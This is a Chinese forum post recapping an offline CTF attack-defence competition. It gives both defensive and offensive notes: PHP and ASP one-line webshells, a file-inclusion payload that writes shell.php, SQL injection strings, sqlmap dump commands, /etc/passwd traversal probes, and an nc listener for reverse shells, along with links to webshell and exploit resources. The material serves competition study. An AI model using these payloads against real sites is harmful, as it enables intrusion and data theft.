CTF线下赛AWD总结

发布于 2019-09-26 作者 风铃 58次 浏览 版块 前端

记录一下自己最近参加的线下攻防比赛,没时间学习了,就准备了几天,果然不出意外的被安全专业的大佬打得很惨。

缺点是不会攻击,我和我队友两个人就只有防,AWD防了400分,综合渗透拿了200分。

感觉自己的知识欠差很多,代码审计能力弱,写脚本能力弱,sql注入我一直学不会。最重要的是比赛前没有真正练习过,所以比赛时才没把技能发挥出来。谨记:多实践,学好代码审计,sql注入,手动写脚本!!

比完赛才对这两种比赛模式有了清晰的了解。

AWD就是每队有自己要维护的几台linux靶机,为低权限或者www权限,对自己的网站进行防守,对他人进行攻击。

综合渗透分外网,内网,专网,需要先渗透外网,在让外网作为跳板机访问内网,专网。

给了两个靶机是永恒之蓝漏洞,但比赛时没想到,就没法做,还有一台直接ssh登陆,就有几个flag。

比赛特别好,服务特别好,边打比赛,还有水果吃,住的宾馆,伙食很棒。对这次比赛满意,也涨了很多经验,督促自己如何去学习。下面是比赛时的源码。内附很多比赛之前看的网站,

一、ssh登陆,修改密码超级复杂,mobaxterm,xshell。

     普通用户提权成root,根据kernel版本号找到对应的poc,exp提权。

二、下载源码,备份,/var/www/html 目录,mobaxterm,winscp,xftp等。

三、预留后门,御剑,k8飞刀,D盾,扫描目录,发现后门,注释代码。

四、修改数据库密码,

> mysql -u root -p

Show databases;

use mysql;

set password for root@localhost = password('123');  或者

update user set password = PASSWORD('要更换的密码') where user = 'root';

flush privileges

show tables;可能有flag

select * from typecho_flag;

五、关闭不必要的端口,要求的服务端口不能关,

netstat -napt ,lsof -i 查看端口,

kill -9 PID 杀掉进程

nmap -sV ip地址(-sV参数可以探测目标主机的服务器版本)

nmap扫描对方开启的端口,21,22,21,3306,进行爆破,msfconsole进入metasploit ,,,

六、代码审计  seay源代码审计好用,

常见漏洞:一句话木马,SQL注入、文件包含、文件上传,越权访问,命令执行。

  1. 一句话木马

  

防:vim自己的网站php文件,注释掉一句话木马,

<?php @eval($_REQUEST['c']); ?>     <?php @eval($_POST['c']); ?>

asp的一句话是:<%eval request("xx")%>

没有限制文件上传类型,允许后门上传

攻:菜刀连接一句话木马所在php的网站路径,输入密码,即可进入到后台,获取网站目录,进而上传大马,获取最高权限webshell。

没有的话,自行网站文件上传一句话木马,对文件类型有限制的话需要BurpSuite抓包,修改content type image/php,根据返回的路径,连接菜刀。

权限维持:1.不死马, 2. nc反弹shell  nc -lp 9999

  1. SQL注入漏洞

(1)用户登录,输入’测试存在sql注入点,万能密码 ' or 1='1   弱密码 admin/admin  火狐插件hackbar

select name,pass from tbAdmin where name='' or 1='1' and pass='123456'

(2)啊D扫描网站sql注入点,sqlmap注入,

比赛时Access数据库注入点:

http://10.1.14.1/ReadNews.asp?NewsID=20&BigClassID=2&SmallClassID=2

sqlmap -u "url"  查看系统,版本

sqlmap -u "url" --dbs 爆数据库

sqlmap -u "url" --tables -D ctf 爆表

sqlmap -u "url" --column -D ctf -T users 爆列

sqlmap -u "url" --dump -D ctf -T users "user_name,user_pass"  爆字段

网站数据库密码信息文件一般放在config.php中。

3.文件包含

(1)本地文件包含

localhost/a.php?file=/flag.txt

(2)远程文件包含

localhost/a.php?file=http:ip/echo.txt

利用,上传一句话木马

echo.txt 文件内容,会生成shell.php  内容为一句话木马。

<?php fputs(fopen("shell.php","w"),"<?php eval(\$_POST[xx]);?>");?>

常见的文件包含函数,include(),include_once(),require(),require_once()

几种经典的测试方法:

?file=../../../../../etc/passwd  长目录截断

?page=file:///etc/passwd   读取敏感文件

?home=main.cgi

?page=http://www.a.com/1.php

http://1.1.1.1/../../../../dir/file.txt

4.越权访问   allow_url_fopen  =ON, allow_url_include =ON

水平越权:修改id,访问他人

垂直越权:知道管理后台的url,通过访问,提升权限,获取数据。

/admin/upload/config.php  越权访问,无需登陆,直接显示 

  1. 命令执行漏洞 

直接调用操作系统命令,常见php函数system,exec,shell_exec

 

 

七、网站防御

上WAF,文件监控,安全狗, 

在文件头写上,require_once(‘waf.php’);

八、日志分析,根据自己攻击payload去攻击他人。

写脚本批量拿flag。

 

综合靶场

Nmap扫描靶机,查看系统,metasploit 漏洞利用,根据相应的系统内核漏洞,提权,

获取后台密码,登录后台,根目录下flag

创建新用户,添加到管理员组,远程目标靶机。

可能存在flag的位置:

  1. 御剑扫描,双击网页打开,存在flag。

  2. ssh登陆,系统根目录下,/var/www/html下

  3. mysql数据库字段中。

  4. 远程主机桌面,文件夹下。

  5.  

==================网站合集====================

www.51elab.com/product02.html      易霖博
https://www.anquanke.com/        安全客  很棒
http://www.freebuf.com/         freebuf
http://www.mumaasp.com/139.html     很厉害的大马
http://webshell8.com/
http://www.jiaoben.net/wenzhanglist/93.html    脚本之家

==========================
线下赛笔记
https://blog.csdn.net/wy_97/article/details/78148705
http://www.sohu.com/a/211760248_99907709
https://www.anquanke.com/post/id/86984
https://www.anquanke.com/post/id/98574
https://www.anquanke.com/post/id/98653
https://www.anquanke.com/post/id/100991
https://www.anquanke.com/post/id/84675
http://tinyfisher.github.io/security/2017/10/02/CTF

http://www.freebuf.com/articles/web/118149.html

https://blog.csdn.net/like98k/article/details/80261603

=============================

https://www.exploit-db.com/exploits/15620/           漏洞
http://exploit.linuxnote.org/                内核漏洞
https://www.cnblogs.com/linuxsec/articles/6110887.html      提权
https://www.cnblogs.com/yuhuLin/p/7027342.html         普通用户提权
http://www.freebuf.com/sectool/121847.html         Linux提权?这四个脚本可以帮助你

https://github.com/Ares-X/AWD-Predator-Framework          AWD攻防赛webshell批量利用框架
https://github.com/admintony/Prepare-for-AWD      AWD线下赛脚本集合
https://github.com/ssooking/CTFDefense        CTFDefense
https://github.com/wupco/weblogger            针对ctf线下赛流量抓取(php)、真实环境流量抓取分析的工具
http://hackblog.cn/post/75.html             waf
https://jingyan.baidu.com/article/d45ad148a8338769552b803a.html   安全狗安装教程
http://www.safedog.cn/website_safedog.html             安全狗linux版:

https://blog.csdn.net/qq_36328915/article/details/79305166     kali中msf常用命令
http://www.freebuf.com/articles/5472.html                   w3af简单使用教程
https://www.cnblogs.com/zylq-blog/p/6694566.html         安装

http://blog.51cto.com/simeon/1981572            MySQL数据库***及漏洞利用总结
http://blog.51cto.com/diudiu/1678358           SQLmap配合一句话木马
                        利用Sqlmap进行Access和MySQL的注入
https://note.youdao.com/share/?id=62ecd676d896139c823591e8a8bcc708&type=note#/

 

 

收藏
暂无回复